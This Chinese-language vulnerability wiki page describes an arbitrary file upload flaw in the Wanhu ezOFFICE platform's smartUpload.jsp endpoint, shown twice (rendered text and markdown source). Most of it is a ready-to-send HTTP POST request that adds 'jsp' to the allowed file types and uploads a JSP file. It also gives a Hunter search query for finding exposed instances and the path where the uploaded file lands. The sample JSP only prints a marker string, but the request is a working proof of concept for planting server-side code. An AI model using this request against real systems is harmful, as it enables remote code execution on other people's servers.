fofamini-wiki

登录白背景

源码

万户协同办公平台 smartUpload存在任意文件上传漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台 smartUpload存在任意文件上传漏洞

二、影响版本

万户ezoffice

三、资产测绘

hunterapp.name="万户 Ezoffice OA"
登录页面

四、漏洞复现

POST /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 195
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="photo"; filename="hello.jsp"
Content-Type: image/jpeg

<% out.println("435352Els1K9wZvOlSsdsdmrg"); %>
--00content0boundary00--

根据回显拼接上传文件地址

/defaultroot/upload/information/2024022615565599901279323.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/guft0fr1fg44usd9

# 万户协同办公平台 smartUpload存在任意文件上传漏洞

# 一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台 smartUpload存在任意文件上传漏洞

# 二、影响版本

- 万户ezoffice

# 三、资产测绘

- hunter`app.name="万户 Ezoffice OA"`
- 登录页面

![image.png](./img/rObsKZ0bOSMMAsOz/1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f-251055.png)

# 四、漏洞复现
```
POST /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 195
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="photo"; filename="hello.jsp"
Content-Type: image/jpeg

<% out.println("435352Els1K9wZvOlSsdsdmrg"); %>
--00content0boundary00--
```
![image.png](./img/rObsKZ0bOSMMAsOz/1708934334550-be657035-a76c-4e17-9b02-31c0939084cf-195058.png)
根据回显拼接上传文件地址
```
/defaultroot/upload/information/2024022615565599901279323.jsp
```
![image.png](./img/rObsKZ0bOSMMAsOz/1708934372079-fc2513da-cafd-47cd-b885-96a51784f178-448434.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/guft0fr1fg44usd9>